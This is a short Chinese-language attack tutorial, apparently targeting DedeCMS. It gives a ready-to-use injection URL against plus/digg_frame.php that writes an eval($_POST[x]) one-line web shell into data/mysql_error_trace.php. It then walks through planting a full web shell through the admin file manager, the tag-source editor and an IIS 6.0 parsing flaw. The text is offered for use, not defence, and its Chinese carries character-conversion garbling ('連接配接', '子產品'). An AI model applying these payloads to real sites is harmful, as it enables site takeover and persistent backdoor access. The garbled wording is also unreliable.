1、注入漏洞
存在注入位址:在域名下輸入plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
http://localhost:802/plus/digg_frame.php?action=good&id=1024%651024&mid=*/eval($_POST[x]);var_dump(3);?>
注入成功,産生了注入檔案。
http://localhost:802/data/mysql_error_trace.php
一句話木馬連接配接上傳大馬即可!
注入漏洞詳解見
2、背景拿webshell
第一種方法,利用檔案管理直接建立php大馬```
背景--核心--附件管理--檔案式管理器 建立檔案,寫入大馬檔案直接通路。
如果沒有安裝檔案管理器,可以檢視下插件目錄有沒有此插件檔案。
背景--子產品--子產品管理--檔案管理器 點選安裝,然後在建立php大馬```
如果沒有安裝插件,并删除了插件目錄就無法使用此方法。
第二種方法:利用标簽源碼管理
背景--模闆--标簽源碼管理,随便選擇一個标簽 點編輯。檔案名稱輸入:格式為。xxx.lib.php,内容輸入大馬檔案即可。
第三種方法、利用模闆修改。
此方法利用IIS解析漏洞,前提網站必須在IIS6.0運作。